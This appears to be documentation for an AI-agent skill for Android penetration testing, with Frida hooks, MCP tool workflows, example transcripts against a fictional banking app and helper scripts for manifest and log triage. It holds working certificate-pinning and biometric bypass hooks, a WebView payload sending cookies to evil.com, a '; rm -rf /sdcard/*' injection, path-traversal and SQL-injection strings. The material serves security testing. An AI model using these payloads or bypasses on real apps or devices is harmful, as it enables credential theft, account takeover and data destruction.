Comprehensive Android mobile application penetration testing skill with full ADB shell access to rooted devices. This skill should be used when performing security assessments on Android applications including static analysis, dynamic analysis, runtime manipulation, traffic interception, and vulnerability identification. Triggers on requests to pentest Android apps, test mobile security, analyze APKs, bypass security controls, or perform OWASP Mobile Top 10 assessments.
```shell
npx skill4agent add hardw00t/ai-security-arsenal android-pentest
```

| Tool | Purpose | Installation |
|---|---|---|
| ADB | Device communication | |
| Frida | Dynamic instrumentation | |
| Objection | Mobile exploration | |
| apktool | APK decompilation | |
| jadx | Java decompilation | Download from GitHub |
| Burp Suite | Traffic interception | Download from PortSwigger |
| Android Studio | Emulator/tools | Download from Google |
```json
// ~/.claude/mcp.json
{
  "mcpServers": {
    "android-pentest": {
      "command": "python",
      "args": ["/path/to/android-dynamic/server.py"]
    }
  }
}
```

```json
// Add to ~/.claude/mcp.json
{
  "mcpServers": {
    "mobile-mcp": {
      "command": "npx",
      "args": ["-y", "@anthropic/mobile-mcp", "--android"]
    }
  }
}
```

```shell
# 1. Enable Developer Options (tap Build Number 7 times)
# 2. Enable USB Debugging
# 3. Root device (Magisk recommended)

# Install Frida server
adb push frida-server /data/local/tmp/
adb shell chmod 755 /data/local/tmp/frida-server
adb shell "su -c '/data/local/tmp/frida-server -D &'"
```

```shell
# Use Android Studio emulator with Google APIs (not Play Store)
# Root with rootAVD or system image without Google Play
# Match Frida server architecture (x86_64 for most emulators)
```

```shell
# Verify ADB connection
adb devices

# Verify root access
adb shell su -c "id"

# Verify Frida connection
frida-ps -U

# Test MCP server
# In Claude Code: get_app_info("com.android.settings")
```

```text
User: I need to pentest the app com.example.targetapp

Claude: I'll set up the testing environment.

[MCP Tool Sequence]
1. get_app_info("com.example.targetapp")
   → Version, permissions, SDK levels, signatures
2. pull_apk("com.example.targetapp")
   → Extract APK for static analysis
3. list_exported_components("com.example.targetapp")
   → Map attack surface (activities, services, providers, receivers)
```

```text
[MCP Tool Sequence]
1. frida_spawn("com.example.targetapp")
   → PID: 12345
2. frida_bypass_ssl(12345)
   → SSL pinning disabled
3. frida_bypass_root(12345)
   → Root detection bypassed
4. setup_proxy("device-id", "192.168.1.100", 8080)
   → Traffic interception ready
```

```text
[MCP Tool Sequence]
1. frida_run_script(12345, "crypto_hooks.js")
2. frida_run_script(12345, "credential_hooks.js")
3. frida_run_script(12345, "intent_monitor.js")
4. get_logcat("com.example.targetapp")
```

```text
[MCP Tool Sequence]
1. dump_databases("com.example.targetapp")
2. dump_shared_prefs("com.example.targetapp")
3. dump_internal_storage("com.example.targetapp")
4. dump_external_storage("com.example.targetapp")
```

| Document | Coverage |
|---|---|
| methodology/recon.md | Information gathering, attack surface mapping |
| methodology/static_analysis.md | APK analysis, code review, secrets detection |
| methodology/dynamic_analysis.md | Runtime testing, hooking, instrumentation |
| methodology/network_testing.md | Traffic analysis, API testing, TLS verification |
| methodology/data_storage.md | Local storage, databases, file permissions |
| methodology/crypto_testing.md | Encryption analysis, key management |
| methodology/auth_testing.md | Authentication, session management, biometrics |
| methodology/client_side_injection.md | WebViews, deep links, content providers |
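The attack-surface mapping that `list_exported_components` performs in the recon step can be reproduced from the decoded manifest, and it is worth seeing the export rules written out rather than trusting a tool's summary. The script below is an added example, not code from the android-pentest skill: it parses a constructed `AndroidManifest.xml` (package and component names are made up) with the standard library, applies the three ways a component ends up exported (an explicit `android:exported`, the legacy intent-filter default, and the `minSdkVersion`-dependent provider default), and separates out exported components that carry no `android:permission`, which is the set a reviewer wants to look at first. In practice, feed it the manifest that apktool decodes from the pulled APK.

```python
"""Exported-component audit over a decoded AndroidManifest.xml.

Added example, not code from the android-pentest skill. The manifest below
is constructed for the example; in practice pass the AndroidManifest.xml
that apktool decodes from the pulled APK.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")

# Constructed sample manifest (package and component names are made up).
SAMPLE_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.targetapp">
  <uses-sdk android:minSdkVersion="26" android:targetSdkVersion="30"/>
  <application>
    <activity android:name=".MainActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".DeepLinkActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <data android:scheme="targetapp"/>
      </intent-filter>
    </activity>
    <activity android:name=".SettingsActivity" android:exported="false"/>
    <provider android:name=".provider.UserProvider"
        android:authorities="com.example.targetapp.provider"
        android:exported="true"/>
    <provider android:name=".provider.PrivateProvider"
        android:authorities="com.example.targetapp.private"
        android:exported="true"
        android:permission="com.example.targetapp.READ_PRIVATE"/>
    <receiver android:name=".PushReceiver">
      <intent-filter>
        <action android:name="com.example.targetapp.PUSH"/>
      </intent-filter>
    </receiver>
    <service android:name=".SyncService"/>
  </application>
</manifest>
"""


def _attr(element, name):
    """Read an attribute from the android: namespace."""
    return element.get(f"{{{ANDROID_NS}}}{name}")


def audit_manifest(xml_text):
    """Return one dict per exported component, with the rule that made it exported."""
    root = ET.fromstring(xml_text)
    package = root.get("package", "")
    uses_sdk = root.find("uses-sdk")
    min_sdk = int(_attr(uses_sdk, "minSdkVersion") or 1) if uses_sdk is not None else 1
    app = root.find("application")
    if app is None:
        return []
    exported_components = []
    for el in app:
        if el.tag not in COMPONENT_TAGS:
            continue
        name = _attr(el, "name") or ""
        if name.startswith("."):
            name = package + name
        filters = el.findall("intent-filter")
        explicit = _attr(el, "exported")
        if explicit is not None:
            exported = explicit.lower() == "true"
            rule = "explicit android:exported"
        elif el.tag == "provider":
            # Providers ignore intent filters; the default was true only for minSdk < 17.
            exported = min_sdk < 17
            rule = "provider default (minSdkVersion < 17)"
        else:
            # Legacy default: any intent filter makes the component exported.
            # Apps targeting API 31+ must state it explicitly or fail to install.
            exported = bool(filters)
            rule = "intent-filter default"
        if not exported:
            continue
        exported_components.append({
            "kind": el.tag,
            "name": name,
            "rule": rule,
            "permission": _attr(el, "permission"),
            "actions": [_attr(a, "name") for f in filters for a in f.findall("action")],
            "schemes": [_attr(d, "scheme") for f in filters for d in f.findall("data")
                        if _attr(d, "scheme")],
        })
    return exported_components


def unprotected(exported_components):
    """Exported components reachable by any app: no android:permission on the component."""
    return [c for c in exported_components if c["permission"] is None]


if __name__ == "__main__":
    for c in audit_manifest(SAMPLE_MANIFEST):
        guard = c["permission"] or "NO PERMISSION"
        print(f"{c['kind']:<9} {c['name']:<45} {c['rule']:<36} {guard}")
```

The launcher activity always shows up as exported without a permission, which is expected; the rows that matter are the deep-link activity and the content provider that are reachable with no permission, since those are exactly what the later component-testing phase exercises.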
```python
# Phase 1: Reconnaissance
get_app_info("com.target.app")
pull_apk("com.target.app")
list_exported_components("com.target.app")

# Phase 2: Bypass Protections
pid = frida_spawn("com.target.app")
frida_bypass_ssl(pid)
frida_bypass_root(pid)
setup_proxy(device_id, "192.168.1.100", 8080)

# Phase 3: Dynamic Analysis
frida_run_script(pid, "crypto_hooks.js")
frida_run_script(pid, "credential_hooks.js")
frida_run_script(pid, "intent_monitor.js")

# Phase 4: Data Extraction
dump_databases("com.target.app")
dump_shared_prefs("com.target.app")
dump_internal_storage("com.target.app")

# Phase 5: Component Testing
launch_activity("com.target.app", ".DeepLinkActivity",
                extras={"url": "javascript:alert(1)"})
query_content_provider("content://com.target.app.provider/users")
fuzz_intent_extra("com.target.app", ".ProcessActivity",
                  "data", ["../../../etc/passwd", "' OR '1'='1"])

# Phase 6: Network Testing
capture_traffic_start("com.target.app")
# [interact with app]
capture_traffic_stop()
```

```python
# Method 1: Universal Frida bypass (most apps)
pid = frida_spawn("com.target.app")
frida_bypass_ssl(pid)

# Method 2: Custom script for specific library
frida_run_script(pid, """
Java.perform(function() {
    var CustomPinner = Java.use('com.target.app.security.Pinner');
    CustomPinner.verify.implementation = function() {
        console.log('[+] Bypassed custom pinner');
        return true;
    };
});
""")

# Method 3: If app uses flutter_ssl_pinning
frida_run_script(pid, """
var flutter = Process.findModuleByName("libflutter.so");
Interceptor.attach(Module.findExportByName("libssl.so", "SSL_CTX_set_custom_verify"), {
    onEnter: function(args) {
        args[2] = new NativeCallback(function() { return 0; }, 'int', ['pointer', 'pointer']);
    }
});
""")
```

```python
# Hook authentication methods
frida_hook_method(pid, "com.target.app.auth.AuthService", "login")
frida_hook_method(pid, "com.target.app.auth.TokenValidator", "validateToken")

# Biometric bypass
frida_run_script(pid, "biometric_bypass.js")

# Credential monitoring
frida_run_script(pid, "credential_hooks.js")

# Session manipulation
frida_hook_method(pid, "com.target.app.session.SessionManager", "*")
```

```python
# Map attack surface
components = list_exported_components("com.target.app")

# Test deep links
launch_activity("com.target.app", ".DeepLinkActivity",
                data_uri="targetapp://transfer?amount=1000&to=attacker")

# XSS in WebView
launch_activity("com.target.app", ".WebViewActivity",
                extras={"url": "javascript:document.location='http://evil.com/?c='+document.cookie"})

# Path traversal in file handling
fuzz_intent_extra("com.target.app", ".FileActivity", "filepath", [
    "../../../data/data/com.other.app/databases/secrets.db",
    "file:///data/local/tmp/evil.html",
    "content://com.target.app.provider/../../../etc/passwd"
])

# Content provider SQL injection
query_content_provider("content://com.target.app.provider/users?id=1' OR '1'='1' --")

# Broadcast injection
send_broadcast("com.target.app.CUSTOM_ACTION",
               extras={"command": "; rm -rf /sdcard/*"})
```

```python
# Hook all crypto operations
frida_run_script(pid, "crypto_hooks.js")

# Detect weak algorithms
frida_run_script(pid, """
Java.perform(function() {
    var Cipher = Java.use('javax.crypto.Cipher');
    Cipher.getInstance.overload('java.lang.String').implementation = function(algo) {
        console.log('[CRYPTO] Algorithm: ' + algo);
        if (algo.indexOf('ECB') !== -1) console.log('[!] WEAK: ECB mode');
        if (algo.indexOf('DES') !== -1) console.log('[!] WEAK: DES');
        if (algo.indexOf('RC4') !== -1) console.log('[!] WEAK: RC4');
        return this.getInstance(algo);
    };
});
""")

# Search for hardcoded keys
frida_memory_search(pid, "-----BEGIN RSA PRIVATE KEY-----")
frida_memory_search(pid, "AES_SECRET_KEY")

# Dump encryption keys at runtime
frida_hook_method(pid, "javax.crypto.spec.SecretKeySpec", "$init")
```

```python
# Full data dump
databases = dump_databases("com.target.app")
prefs = dump_shared_prefs("com.target.app")
internal = dump_internal_storage("com.target.app")
external = dump_external_storage("com.target.app")
logs = get_logcat("com.target.app")

# Analyze for sensitive data
# Look for: tokens, passwords, PII, financial data, session IDs

# Monitor data writes in real-time
frida_run_script(pid, """
Java.perform(function() {
    var SharedPrefs = Java.use('android.app.SharedPreferencesImpl$EditorImpl');
    SharedPrefs.putString.implementation = function(key, value) {
        console.log('[PREFS] ' + key + ' = ' + value);
        return this.putString(key, value);
    };
});
""")
```

| Tool | Description | Example |
|---|---|---|
| | Current screen/UI elements | Finding clickable elements |
| | Tap at coordinates | Automating login flow |
| | Type into focused field | Entering credentials |
| | Press key | BACK=4, HOME=3, ENTER=66 |
| | Swipe gesture | Scrolling, pattern unlock |
| | Long press | Context menus |
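The crypto hook and the SharedPreferences hook above each print one console line per call, and on a real session that is hundreds of lines to read by hand. The script below is an added example, not code from the android-pentest skill, that triages such output: it reads a constructed sample of the `[CRYPTO] Algorithm:` and `[PREFS] key = value` lines those hooks emit, parses the JCA transformation string into algorithm, mode and padding instead of substring-matching, and grades each SharedPreferences write by key name and by whether the value is a JWT. Beyond the hook's three `indexOf` checks it also catches `Cipher.getInstance("AES")` with no mode, which JCA providers resolve to `AES/ECB/PKCS5Padding`, and it marks unauthenticated modes such as CBC as a lower-severity note. Log lines, key names and token values are all made up.

```python
"""Triage Frida console output from crypto_hooks / SharedPreferences hooks.

Added example, not code from the android-pentest skill. SAMPLE_LOG is a
constructed transcript in the line formats the hooks on this page print.
"""
import re

# Constructed sample: the first four lines mimic the Cipher.getInstance hook,
# the next three the SharedPreferences putString hook, the last one is noise.
SAMPLE_LOG = """\
[CRYPTO] Algorithm: AES/GCM/NoPadding
[CRYPTO] Algorithm: AES/ECB/PKCS5Padding
[CRYPTO] Algorithm: DESede/CBC/PKCS5Padding
[CRYPTO] Algorithm: AES
[PREFS] theme = dark
[PREFS] auth_token = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiI0MiJ9.c2lnbmF0dXJl
[PREFS] user_pin = 1234
[HOOK] validateSession() called
"""

CRYPTO_RE = re.compile(r"^\[CRYPTO\] Algorithm: (\S+)")
PREFS_RE = re.compile(r"^\[PREFS\] (\S+) = (.*)$")
# header.payload.signature, base64url; the header of every JWT starts with eyJ.
JWT_RE = re.compile(r"^eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*$")
SENSITIVE_KEY_RE = re.compile(r"token|passw|pin|secret|session|api[_-]?key|credential", re.I)

SEVERITY_RANK = {"low": 0, "medium": 1, "high": 2}
BLOCK_CIPHERS = {"AES", "DES", "DESEDE", "BLOWFISH"}
UNAUTHENTICATED_MODES = {"CBC", "CTR", "CFB", "OFB"}


def classify_transformation(transformation):
    """Return (severity, reason) pairs for a JCA transformation such as 'AES/CBC/PKCS5Padding'."""
    parts = transformation.split("/")
    algo = parts[0].upper()
    mode = parts[1].upper() if len(parts) > 1 else None
    reasons = []
    if algo in {"DES", "DESEDE"}:
        reasons.append(("medium", f"{parts[0]}: 64-bit block cipher, deprecated"))
    if algo in {"RC4", "ARCFOUR"}:
        reasons.append(("high", "RC4: broken stream cipher"))
    if mode == "ECB":
        reasons.append(("high", "ECB mode: equal plaintext blocks give equal ciphertext blocks"))
    elif mode is None and algo in BLOCK_CIPHERS:
        reasons.append(("high", "no mode given: JCA providers default to ECB/PKCS5Padding"))
    elif mode in UNAUTHENTICATED_MODES:
        reasons.append(("low", f"{mode} mode has no integrity protection; needs a MAC or an AEAD mode"))
    return reasons


def classify_pref_write(key, value):
    """Return (severity, reason) pairs for one SharedPreferences putString call."""
    reasons = []
    if SENSITIVE_KEY_RE.search(key):
        reasons.append(("medium", f"key name '{key}' suggests a credential"))
    if JWT_RE.match(value):
        reasons.append(("high", "value is a JWT stored in plaintext SharedPreferences"))
    return reasons


def triage(log_text):
    """Turn hook output into findings; each finding keeps its evidence line."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        m = CRYPTO_RE.match(line)
        if m:
            source, reasons = "crypto", classify_transformation(m.group(1))
        else:
            m = PREFS_RE.match(line)
            if not m:
                continue  # not a line from either hook
            source, reasons = "prefs", classify_pref_write(m.group(1), m.group(2))
        if reasons:
            severity = max((sev for sev, _ in reasons), key=SEVERITY_RANK.__getitem__)
            findings.append({"line": lineno, "source": source, "severity": severity,
                             "evidence": line, "reasons": [text for _, text in reasons]})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"[{f['severity'].upper():<6}] line {f['line']}: {f['evidence']}")
        for r in f["reasons"]:
            print(f"           - {r}")
```

Keeping the evidence line in each finding matters for reporting: the MASTG-style write-ups later on this page cite the exact hook output, and a triage step that drops it forces a second capture.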
| Tool | Description | Example |
|---|---|---|
| `frida_spawn` | Start with Frida | Initial attachment |
| `frida_attach` | Attach to running | Already running app |
| `frida_run_script` | Run Frida script | Custom hooks |
| `frida_bypass_ssl` | Bypass SSL pinning | Enable interception |
| `frida_bypass_root` | Bypass root detection | Evade security |
| `frida_hook_method` | Hook method | Trace calls |
| | Trace crypto | Key extraction |
| | Dump credentials | Credential theft |
| `frida_enumerate_classes` | List classes | Class discovery |
| `frida_memory_search` | Search memory | Find secrets |

| Tool | Description | Example |
|---|---|---|
| `setup_proxy` | Configure proxy | Burp interception |
| | Remove proxy | Cleanup |
| | Install CA cert | Trust Burp CA |
| `capture_traffic_start` | Start capture | Record traffic |
| `capture_traffic_stop` | Stop capture | Save PCAP |

| Tool | Description | Example |
|---|---|---|
| `dump_databases` | Extract SQLite DBs | User data, creds |
| `dump_shared_prefs` | Get preferences | Tokens, settings |
| `dump_internal_storage` | Internal files | Config, certs |
| `dump_external_storage` | SD card files | Exports, cache |
| `get_logcat` | Filtered logs | Debug info leak |

| Tool | Description | Example |
|---|---|---|
| `list_exported_components` | Map attack surface | Find entry points |
| `launch_activity` | Start activity | Deep link test |
| `send_broadcast` | Send broadcast | Broadcast injection |
| | Start service | Service abuse |
| `query_content_provider` | Query provider | Data leakage |
| `fuzz_intent_extra` | Fuzz intents | Find vulns |

| Tool | Description | Example |
|---|---|---|
| | Install APK | Deploy test build |
| | Remove app | Cleanup |
| | Clear data | Fresh state |
| `get_app_info` | App metadata | Permissions, SDK |
| `list_installed_apps` | All packages | Discovery |
| `pull_apk` | Extract APK | Static analysis |
/scripts/

| Script | Purpose |
|---|---|
| `ssl_pinning_bypass.js` | Universal SSL/TLS pinning bypass |
| `root_bypass.js` | Root detection bypass |
| `crypto_hooks.js` | Cryptographic operation monitoring |
| `credential_hooks.js` | Credential capture |
| | Network traffic monitoring |
| `biometric_bypass.js` | Biometric authentication bypass |
| `anti_tampering_bypass.js` | Anti-tampering/debugger bypass |
| `intent_monitor.js` | Intent/IPC monitoring |
| | WebView security monitoring |
| | Dynamic code loading detection |
| `keystore_hooks.js` | Android Keystore monitoring |
| `method_tracer.js` | Generic method tracing |
```shell
# Solution: Verify package name
list_installed_apps() | grep <partial_name>
adb shell pm list packages | grep <partial_name>
```

```python
# Solution: App not running, use spawn instead
pid = frida_spawn("com.target.app")  # Instead of frida_attach
```

```python
# Solution: Class/method not found
frida_enumerate_classes(pid, "*TargetClass*")  # Find exact class
# Check for obfuscation - class names may be: a, b, c, etc.
```

```shell
# Solution: Version mismatch
frida --version  # Check client version
# Download matching server from https://github.com/frida/frida/releases
```

```text
# Solution: Custom pinning implementation
1. Decompile APK with jadx
2. Search: "certificate", "pin", "ssl", "trust"
3. Identify custom class and method
4. Write targeted Frida hook
# Check for: OkHttp CertificatePinner, custom TrustManager,
# native SSL verification, Network Security Config
```

```text
# Solution: Multiple pinning layers
1. Check for native SSL verification (libssl.so)
2. Use anti_tampering_bypass.js for Frida detection bypass
3. Try objection: android sslpinning disable
4. Consider frida-gadget for persistent injection
```

```text
# Solution: Multiple detection vectors
1. Use comprehensive root_bypass.js
2. Enable Magisk Hide / Zygisk DenyList
3. Check for native root checks (hook fopen, access)
4. Consider frida-gadget embedded in APK
```

```text
# Solution: Frida detection in place
1. Use anti_tampering_bypass.js first
2. Rename frida-server binary
3. Use frida-gadget instead
4. Hook pthread_create to hide Frida threads
```

```shell
adb kill-server
adb start-server
# Accept prompt on device
```

```shell
adb root  # If using userdebug build
adb shell su -c "cat /data/data/<pkg>/..."  # With root
```

```python
# Hook to capture password
frida_hook_method(pid, "net.sqlcipher.database.SQLiteDatabase", "openOrCreateDatabase")
# Or search memory for key
frida_memory_search(pid, "x]@1#%hJ")  # Common patterns
```

| Checklist | Purpose |
|---|---|
| checklists/owasp_mastg_full.md | Complete MASTG compliance |
| checklists/quick_wins.md | Fast vulnerability finding |
| checklists/pre_engagement.md | Setup verification |
| checklists/report_items.md | Report completeness |
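Several of the troubleshooting entries above (Frida failing to attach, hooks silently doing nothing, "version mismatch") come down to the frida client on the host, the frida-server on the device, and the device ABI not agreeing. The script below is an added example, not code from the android-pentest skill, that collects the three values and reports the specific mismatch together with the release asset to fetch. It assumes the standard `adb` and `frida` CLIs, that frida-server was pushed to `/data/local/tmp/frida-server` as in the setup section, and the asset naming used on https://github.com/frida/frida/releases (`frida-server-<version>-android-<arch>.xz`); the version strings and ABIs in the test are constructed.

```python
"""Pre-flight check: do frida client, frida-server and device ABI agree?

Added example, not code from the android-pentest skill. Assumes the standard
adb and frida CLIs and the frida GitHub release naming for server builds.
"""
import re
import subprocess

# Android ABI (adb shell getprop ro.product.cpu.abi) -> suffix of the frida release asset.
ABI_TO_FRIDA_ARCH = {
    "arm64-v8a": "arm64",
    "armeabi-v7a": "arm",
    "x86_64": "x86_64",
    "x86": "x86",
}

FRIDA_SERVER_PATH = "/data/local/tmp/frida-server"  # where the setup section pushes it


def parse_version(output):
    """Extract MAJOR.MINOR.PATCH from `frida --version` / `frida-server --version` output."""
    m = re.search(r"\d+\.\d+\.\d+", output or "")
    return m.group(0) if m else None


def server_asset_name(version, abi):
    """Release asset that matches a client version and a device ABI."""
    arch = ABI_TO_FRIDA_ARCH.get(abi)
    if arch is None:
        raise ValueError(f"unsupported ABI: {abi}")
    return f"frida-server-{version}-android-{arch}.xz"


def versions_match(client_out, server_out):
    client, server = parse_version(client_out), parse_version(server_out)
    return client is not None and client == server


def diagnose(client_out, server_out, abi):
    """Return human-readable problems; an empty list means the setup is consistent."""
    problems = []
    client = parse_version(client_out)
    server = parse_version(server_out)
    if abi not in ABI_TO_FRIDA_ARCH:
        problems.append(f"unknown device ABI {abi!r}; no matching frida-server build")
    if client is None:
        problems.append("frida client not found or its version is unreadable (pip install frida-tools)")
    if server is None:
        problems.append("frida-server did not report a version (not pushed, not executable, or not started as root)")
    elif client is not None and client != server:
        hint = f"; install {server_asset_name(client, abi)}" if abi in ABI_TO_FRIDA_ARCH else ""
        problems.append(f"version mismatch: client {client} vs server {server}{hint}")
    return problems


def _run(cmd):
    """Run a command and return stdout; a missing binary yields an empty string."""
    try:
        return subprocess.run(cmd, capture_output=True, text=True, check=False).stdout
    except FileNotFoundError:
        return ""


def check_device():
    """Query the host and the attached device, then diagnose. Needs adb and frida installed."""
    abi = _run(["adb", "shell", "getprop", "ro.product.cpu.abi"]).strip()
    client_out = _run(["frida", "--version"])
    server_out = _run(["adb", "shell", FRIDA_SERVER_PATH, "--version"])
    return diagnose(client_out, server_out, abi)


if __name__ == "__main__":
    issues = check_device()
    print("frida setup consistent" if not issues else "\n".join(f"[!] {p}" for p in issues))
```

Run this before reaching for the anti-detection entries in the troubleshooting list: a client/server version skew produces the same symptom (attach succeeds, hooks never fire) as an app that detects Frida, and it is far cheaper to rule out.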
| Template | Purpose |
|---|---|
| templates/finding_template.md | Individual finding docs |
| templates/executive_summary.md | Management summary |
| templates/technical_report.md | Full technical report |
| templates/remediation_guide.md | Developer fixes |
```text
User: I need to pentest com.megabank.mobile. It has SSL pinning and root
detection.

Claude: I'll set up the testing environment for com.megabank.mobile.

[Executes MCP tools]

1. Getting app information:
   > get_app_info("com.megabank.mobile")
   Version: 3.2.1, Target SDK: 33, Min SDK: 26
   Permissions: INTERNET, CAMERA, BIOMETRIC, READ_CONTACTS...

2. Extracting APK:
   > pull_apk("com.megabank.mobile")
   Saved to: /tmp/com.megabank.mobile.apk

3. Mapping attack surface:
   > list_exported_components("com.megabank.mobile")
   Exported Activities:
   - com.megabank.mobile.DeepLinkActivity (intent-filter: megabank://)
   - com.megabank.mobile.ShareReceiveActivity
   Content Providers:
   - com.megabank.mobile.provider.DocumentProvider (exported)
   Broadcast Receivers:
   - com.megabank.mobile.PushReceiver

4. Starting with Frida and bypassing protections:
   > frida_spawn("com.megabank.mobile")
   PID: 12345
   > frida_bypass_ssl(12345)
   [+] SSL pinning bypass active - hooked 8 methods
   > frida_bypass_root(12345)
   [+] Root detection bypass active

5. Configuring traffic interception:
   > setup_proxy("emulator-5554", "192.168.1.100", 8080)
   [+] Proxy configured

Environment ready. I've identified 3 potential entry points for testing:
1. Deep link handler (megabank://) - test for URL scheme hijacking
2. DocumentProvider - test for path traversal
3. PushReceiver - test for broadcast injection

Would you like me to proceed with dynamic analysis or test specific components?
```

```text
User: Check what sensitive data this app stores locally

Claude: I'll perform comprehensive data storage analysis.

[Executes MCP tools]

1. SharedPreferences analysis:
   > dump_shared_prefs("com.megabank.mobile")
   [!] FINDING in auth_prefs.xml:
   - auth_token: "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
   - refresh_token: "dGhpcyBpcyBhIHJlZnJlc2ggdG9rZW4..."
   - pin_hash: "5e884898da28047d9166..."
   Severity: HIGH - Authentication tokens stored in plaintext
   MASTG: MASTG-TEST-0001 (Insecure Data Storage)

2. Database analysis:
   > dump_databases("com.megabank.mobile")
   Found: app_data.db (356 KB)
   [!] FINDING:
   - Table 'accounts': account_number, balance, last_transaction
   - Table 'transactions': 847 records with transaction history
   - Table 'cached_credentials': username, password_hash
   Severity: HIGH - Financial data in unencrypted database
   MASTG: MASTG-TEST-0001

3. Internal storage:
   > dump_internal_storage("com.megabank.mobile")
   [!] FINDING: /files/user_profile.json
   Contains: full_name, email, phone, ssn_last_4
   Severity: MEDIUM - PII in plaintext file

4. External storage:
   > dump_external_storage("com.megabank.mobile")
   [!] FINDING: /Android/data/com.megabank.mobile/files/exports/
   - statements_2024.pdf (world-readable)
   Severity: MEDIUM - Sensitive docs on external storage
   MASTG: MASTG-TEST-0003

Summary:
| Finding                          | Severity | MASTG ID        |
|----------------------------------|----------|-----------------|
| Auth tokens in SharedPreferences | High     | MASTG-TEST-0001 |
| Unencrypted SQLite database      | High     | MASTG-TEST-0001 |
| PII in plaintext files           | Medium   | MASTG-TEST-0002 |
| Docs on external storage         | Medium   | MASTG-TEST-0003 |
```

```text
User: Test the authentication for vulnerabilities

Claude: I'll test authentication mechanisms comprehensively.

[Executes MCP tools]

1. Hooking authentication flow:
   > frida_run_script(12345, "credential_hooks.js")
   [HOOK] SharedPreferences write: auth_token = eyJ...
   [HOOK] HTTP Header: Authorization: Bearer eyJ...

2. Biometric testing:
   > frida_run_script(12345, "biometric_bypass.js")
   [HOOK] BiometricPrompt.authenticate() called
   [BYPASS] Simulating successful authentication
   [!] FINDING: Biometric bypass successful
   - App accepts fake biometric success callback
   - No server-side verification
   Severity: HIGH - Authentication bypass
   MASTG: MASTG-TEST-0015

3. Session analysis:
   > frida_hook_method(12345, "com.megabank.mobile.auth.SessionManager", "*")
   [HOOK] validateSession(): Only checks local JWT expiry
   [HOOK] refreshSession(): No server round-trip
   [!] FINDING: Client-side session validation
   - JWT expiry can be modified locally
   - Sessions never verified server-side
   Severity: HIGH - Broken session management
   MASTG: MASTG-TEST-0016

4. Token analysis:
   > frida_run_script(12345, """
   Java.perform(function() {
       var JWT = Java.use('com.auth0.jwt.JWT');
       JWT.decode.implementation = function(token) {
           console.log('[JWT] ' + token);
           return this.decode(token);
       };
   });
   """)
   [!] FINDING: JWT uses HS256 (weak algorithm)
   [!] FINDING: JWT contains: account_id, role, permissions

Findings Summary:
| Issue                | Severity | Impact                         |
|----------------------|----------|--------------------------------|
| Biometric bypass     | High     | Full account access            |
| Client-side sessions | High     | Persistent unauthorized access |
| Weak JWT algorithm   | Medium   | Potential token forgery        |
```